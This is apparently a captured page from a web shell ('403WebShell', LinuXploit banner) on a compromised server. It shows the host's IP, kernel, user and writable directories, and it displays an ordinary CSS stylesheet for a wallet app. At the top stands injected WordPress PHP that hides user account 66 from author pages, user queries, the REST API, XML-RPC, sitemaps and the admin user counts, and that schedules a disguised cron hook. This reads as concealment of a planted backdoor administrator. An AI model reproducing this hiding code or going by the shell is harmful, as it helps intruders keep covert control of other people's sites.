add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emajiwallet/public/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/emajiwallet/public/css/light.css
/* ============================================
   Clean Light Design System
   ============================================ */

/* Root Variables - Light Minimal Palette */
:root {
    /* Clean System Colors */
    --light-blue: #0066CC;
    --light-green: #28A745;
    --light-indigo: #6366F1;
    --light-orange: #F59E0B;
    --light-pink: #EC4899;
    --light-purple: #9333EA;
    --light-red: #DC2626;
    --light-teal: #14B8A6;
    --light-yellow: #EAB308;

    /* Background Colors */
    --light-bg-primary: #FFFFFF;
    --light-bg-secondary: #F8F9FA;
    --light-bg-tertiary: #F1F3F5;

    /* Text Colors */
    --text-primary: #1A1A1A;
    --text-secondary: #6C757D;
    --text-tertiary: #ADB5BD;

    /* Glass Effect Variables */
    --glass-blur: 20px;
    --glass-opacity: 0.95;
    --glass-border: rgba(0, 0, 0, 0.06);

    /* Shadows */
    --shadow-sm: 0 1px 3px rgba(0, 0, 0, 0.06);
    --shadow-md: 0 2px 8px rgba(0, 0, 0, 0.08);
    --shadow-lg: 0 4px 16px rgba(0, 0, 0, 0.1);

    /* Border Radius */
    --radius-xs: 6px;
    --radius-sm: 10px;
    --radius-md: 14px;
    --radius-lg: 18px;
    --radius-xl: 22px;
    --radius-2xl: 28px;
}

/* ============================================
   Base Styles
   ============================================ */

body {
    font-family: -apple-system, BlinkMacSystemFont, "Inter", "Segoe UI", "Helvetica Neue", sans-serif;
    font-size: 16px;
    line-height: 1.6;
    color: var(--text-primary);
    background: linear-gradient(180deg, #FFFFFF 0%, #F8F9FA 100%);
    background-attachment: fixed;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

/* ============================================
   Glass Container
   ============================================ */

.glass-container {
    background: rgba(255, 255, 255, 0.98);
    backdrop-filter: blur(var(--glass-blur)) saturate(100%);
    -webkit-backdrop-filter: blur(var(--glass-blur)) saturate(100%);
    border: 1px solid var(--glass-border);
    box-shadow: var(--shadow-lg);
    border-radius: var(--radius-2xl);
    max-width: 430px;
    margin: 0 auto;
    overflow: hidden;
}

@media (max-width: 430px) {
    .glass-container {
        border-radius: 0;
        max-width: 100%;
        min-height: 100vh;
    }
}

/* ============================================
   Navigation Bar (Light Mode)
   ============================================ */

.navbar {
    background: rgba(255, 255, 255, 0.98) !important;
    backdrop-filter: blur(10px) saturate(100%);
    -webkit-backdrop-filter: blur(10px) saturate(100%);
    border-bottom: 1px solid rgba(0, 0, 0, 0.06);
    padding: 14px 18px;
}

.navbar-brand {
    font-size: 19px;
    font-weight: 700;
    letter-spacing: -0.3px;
    color: var(--text-primary) !important;
}

.nav-link {
    font-size: 15px;
    font-weight: 500;
    color: var(--text-secondary) !important;
    padding: 8px 14px !important;
    border-radius: var(--radius-sm);
    transition: all 0.2s ease;
}

.nav-link:hover {
    background: rgba(0, 102, 204, 0.08);
    color: var(--light-blue) !important;
}

.nav-link.active {
    background: rgba(0, 102, 204, 0.12);
    color: var(--light-blue) !important;
    font-weight: 600;
}

/* ============================================
   Glass Cards
   ============================================ */

.glass-card {
    background: rgba(255, 255, 255, 0.95);
    backdrop-filter: blur(15px) saturate(100%);
    -webkit-backdrop-filter: blur(15px) saturate(100%);
    border: 1px solid rgba(0, 0, 0, 0.08);
    border-radius: var(--radius-xl);
    box-shadow: var(--shadow-md);
    padding: 22px;
    transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
    overflow: hidden;
    position: relative;
}

.glass-card:hover {
    transform: translateY(-3px);
    box-shadow: var(--shadow-lg);
    border-color: rgba(0, 0, 0, 0.12);
}

.glass-card:active {
    transform: translateY(-1px);
}

/* ============================================
   Card Variants
   ============================================ */

.card {
    border: none;
    border-radius: var(--radius-xl);
    overflow: hidden;
    transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
}

.card.glass-card.profession {
    background: linear-gradient(135deg,
        rgba(40, 167, 69, 0.95) 0%,
        rgba(40, 167, 69, 1) 100%
    );
    backdrop-filter: blur(10px);
    color: white;
    border: 1px solid rgba(40, 167, 69, 0.3);
}

.card.glass-card.qualification {
    background: linear-gradient(135deg,
        rgba(99, 102, 241, 0.95) 0%,
        rgba(99, 102, 241, 1) 100%
    );
    backdrop-filter: blur(10px);
    color: white;
    border: 1px solid rgba(99, 102, 241, 0.3);
}

.card.glass-card.job {
    background: linear-gradient(135deg,
        rgba(236, 72, 153, 0.95) 0%,
        rgba(236, 72, 153, 1) 100%
    );
    backdrop-filter: blur(10px);
    color: white;
    border: 1px solid rgba(236, 72, 153, 0.3);
}

.card.glass-card.educator {
    background: linear-gradient(135deg,
        rgba(20, 184, 166, 0.95) 0%,
        rgba(20, 184, 166, 1) 100%
    );
    backdrop-filter: blur(10px);
    color: white;
    border: 1px solid rgba(20, 184, 166, 0.3);
}

.card.glass-card.credential {
    background: rgba(255, 255, 255, 0.98);
    backdrop-filter: blur(10px);
}

/* Tile Cards */
.card.tile-card,
.card.tile {
    border-radius: var(--radius-lg);
    padding: 22px;
    cursor: pointer;
    position: relative;
    overflow: hidden;
}

.card.tile-card::after,
.card.tile::after {
    content: '';
    position: absolute;
    top: 0;
    right: 0;
    width: 100px;
    height: 100px;
    background: radial-gradient(circle, rgba(0, 0, 0, 0.03) 0%, transparent 70%);
    pointer-events: none;
}

/* Icon Cards */
.card.icon {
    aspect-ratio: 1 / 1;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    border-radius: var(--radius-md);
    padding: 14px;
    font-size: 0.8rem;
    position: relative;
    overflow: hidden;
}

.card.icon img {
    max-height: 60%;
    max-width: 80%;
    object-fit: contain;
    filter: drop-shadow(0 1px 2px rgba(0, 0, 0, 0.08));
}

/* ============================================
   Buttons (Light Mode)
   ============================================ */

.btn {
    font-size: 15px;
    font-weight: 600;
    border-radius: var(--radius-sm);
    border: none;
    transition: all 0.2s ease;
    letter-spacing: -0.1px;
}

.btn-primary {
    background: var(--light-blue);
    color: white;
    box-shadow: 0 2px 6px rgba(0, 102, 204, 0.2);
}

.btn-primary:hover {
    background: #0052A3;
    box-shadow: 0 3px 10px rgba(0, 102, 204, 0.3);
    transform: translateY(-1px);
}

.btn-primary:active {
    transform: translateY(0);
    box-shadow: 0 1px 3px rgba(0, 102, 204, 0.2);
}

.btn-outline-dark {
    border: 1.5px solid rgba(0, 0, 0, 0.2);
    background: rgba(255, 255, 255, 0.95);
    color: var(--text-primary);
}

.btn-outline-dark:hover {
    background: rgba(0, 0, 0, 0.04);
    border-color: rgba(0, 0, 0, 0.3);
    color: var(--text-primary);
}

.btn-danger {
    background: var(--light-red);
    color: white;
    box-shadow: 0 2px 6px rgba(220, 38, 38, 0.2);
}

.btn-danger:hover {
    background: #B91C1C;
    box-shadow: 0 3px 10px rgba(220, 38, 38, 0.3);
}

/* ============================================
   Badges (Light Mode)
   ============================================ */

.badge {
    padding: 6px 13px;
    font-size: 13px;
    font-weight: 600;
    border-radius: 16px;
    letter-spacing: -0.05px;
}

.badge.bg-success {
    background: var(--light-green) !important;
    box-shadow: 0 2px 4px rgba(40, 167, 69, 0.2);
}

.badge.bg-primary {
    background: var(--light-blue) !important;
    box-shadow: 0 2px 4px rgba(0, 102, 204, 0.2);
}

.badge.bg-info {
    background: var(--light-teal) !important;
    box-shadow: 0 2px 4px rgba(20, 184, 166, 0.2);
}

.badge.bg-warning {
    background: var(--light-orange) !important;
    color: white !important;
    box-shadow: 0 2px 4px rgba(245, 158, 11, 0.2);
}

.badge.bg-secondary {
    background: rgba(108, 117, 125, 0.15) !important;
    color: var(--text-secondary) !important;
}

/* ============================================
   Alerts (Light Mode)
   ============================================ */

.alert {
    border: none;
    border-radius: var(--radius-md);
    padding: 16px 20px;
    background: rgba(255, 255, 255, 0.98);
    backdrop-filter: blur(10px);
    box-shadow: var(--shadow-sm);
}

.alert-success {
    background: linear-gradient(135deg,
        rgba(40, 167, 69, 0.08) 0%,
        rgba(40, 167, 69, 0.04) 100%
    );
    color: #1E7E34;
    border-left: 3px solid var(--light-green);
}

.alert-info {
    background: linear-gradient(135deg,
        rgba(0, 102, 204, 0.08) 0%,
        rgba(0, 102, 204, 0.04) 100%
    );
    color: #004085;
    border-left: 3px solid var(--light-blue);
}

.alert-warning {
    background: linear-gradient(135deg,
        rgba(245, 158, 11, 0.08) 0%,
        rgba(245, 158, 11, 0.04) 100%
    );
    color: #856404;
    border-left: 3px solid var(--light-orange);
}

.alert-danger {
    background: linear-gradient(135deg,
        rgba(220, 38, 38, 0.08) 0%,
        rgba(220, 38, 38, 0.04) 100%
    );
    color: #721C24;
    border-left: 3px solid var(--light-red);
}

/* ============================================
   Typography (Light Mode)
   ============================================ */

h1, h2, h3, h4, h5, h6 {
    font-weight: 700;
    letter-spacing: -0.4px;
    color: var(--text-primary);
}

h1 {
    font-size: 32px;
    line-height: 1.2;
    margin-bottom: 10px;
}

h2 {
    font-size: 26px;
    line-height: 1.25;
    margin-bottom: 8px;
}

h3 {
    font-size: 22px;
    line-height: 1.3;
    margin-bottom: 7px;
}

h4 {
    font-size: 19px;
    font-weight: 600;
    line-height: 1.35;
}

h5 {
    font-size: 16px;
    font-weight: 600;
    line-height: 1.4;
}

.card-title {
    font-size: 19px;
    font-weight: 600;
    letter-spacing: -0.2px;
    margin-bottom: 8px;
}

.card-subtitle {
    font-size: 14px;
    font-weight: 500;
    color: var(--text-secondary);
    letter-spacing: 0px;
}

/* ============================================
   Modal (Light Mode)
   ============================================ */

.modal-content {
    border: none;
    border-radius: var(--radius-2xl);
    background: rgba(255, 255, 255, 0.98);
    backdrop-filter: blur(20px);
    box-shadow: 0 15px 50px rgba(0, 0, 0, 0.15);
    overflow: hidden;
}

.modal-header {
    border-bottom: 1px solid rgba(0, 0, 0, 0.06);
    padding: 20px 24px;
}

.modal-title {
    font-size: 21px;
    font-weight: 700;
    letter-spacing: -0.3px;
}

.modal-body {
    padding: 24px;
}

.modal-footer {
    border-top: 1px solid rgba(0, 0, 0, 0.06);
    padding: 16px 24px;
}

.btn-close {
    opacity: 0.5;
    transition: opacity 0.2s;
}

.btn-close:hover {
    opacity: 0.9;
}

/* ============================================
   Credential Tiles (Light Mode)
   ============================================ */

.credential-tile {
    background: rgba(255, 255, 255, 0.98);
    backdrop-filter: blur(10px) saturate(100%);
    border: 1px solid rgba(0, 0, 0, 0.08);
    border-radius: var(--radius-md);
    padding: 14px;
    transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
    cursor: pointer;
    position: relative;
    overflow: hidden;
}

.credential-tile::before {
    content: '';
    position: absolute;
    top: -50%;
    left: -50%;
    width: 200%;
    height: 200%;
    background: radial-gradient(circle, rgba(0, 0, 0, 0.02) 0%, transparent 60%);
    opacity: 0;
    transition: opacity 0.3s;
}

.credential-tile:hover::before {
    opacity: 1;
}

.credential-tile:hover {
    transform: translateY(-3px);
    box-shadow: 0 6px 20px rgba(0, 0, 0, 0.12);
    border-color: rgba(0, 0, 0, 0.12);
}

/* ============================================
   Form Controls (Light Mode)
   ============================================ */

.form-control,
.form-select {
    border: 1px solid rgba(0, 0, 0, 0.12);
    border-radius: var(--radius-xs);
    padding: 11px 15px;
    font-size: 15px;
    background: rgba(255, 255, 255, 0.98);
    color: var(--text-primary);
    transition: all 0.2s ease;
}

.form-control:focus,
.form-select:focus {
    border-color: var(--light-blue);
    box-shadow: 0 0 0 3px rgba(0, 102, 204, 0.08);
    outline: none;
    background: rgba(255, 255, 255, 1);
}

.form-label {
    font-size: 14px;
    font-weight: 600;
    color: var(--text-secondary);
    margin-bottom: 7px;
    letter-spacing: 0px;
}

/* ============================================
   Scrollbar (Light Mode)
   ============================================ */

::-webkit-scrollbar {
    width: 8px;
    height: 8px;
}

::-webkit-scrollbar-track {
    background: rgba(0, 0, 0, 0.03);
}

::-webkit-scrollbar-thumb {
    background: rgba(0, 0, 0, 0.15);
    border-radius: 10px;
}

::-webkit-scrollbar-thumb:hover {
    background: rgba(0, 0, 0, 0.25);
}

/* ============================================
   Animations
   ============================================ */

@keyframes fadeInUp {
    from {
        opacity: 0;
        transform: translateY(15px);
    }
    to {
        opacity: 1;
        transform: translateY(0);
    }
}

.fade-in-up {
    animation: fadeInUp 0.35s cubic-bezier(0.4, 0, 0.2, 1);
}

/* ============================================
   Utility Classes
   ============================================ */

.glass-blur {
    backdrop-filter: blur(var(--glass-blur));
    -webkit-backdrop-filter: blur(var(--glass-blur));
}

.shadow-ios {
    box-shadow: var(--shadow-md);
}

.text-ios-secondary {
    color: var(--text-secondary);
}

.text-ios-tertiary {
    color: var(--text-tertiary);
}

.bg-glass {
    background: rgba(255, 255, 255, 0.95);
    backdrop-filter: blur(15px) saturate(100%);
    -webkit-backdrop-filter: blur(15px) saturate(100%);
}

/* ============================================
   Square Qualification Cards
   ============================================ */

.glass-card.qualification-square {
    aspect-ratio: 1 / 1;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}

/* ============================================
   Responsive Adjustments
   ============================================ */

@media (max-width: 768px) {
    h1 { font-size: 28px; }
    h2 { font-size: 24px; }
    h3 { font-size: 20px; }

    .glass-card {
        border-radius: var(--radius-lg);
    }

    .card.tile-card,
    .card.tile {
        border-radius: var(--radius-md);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit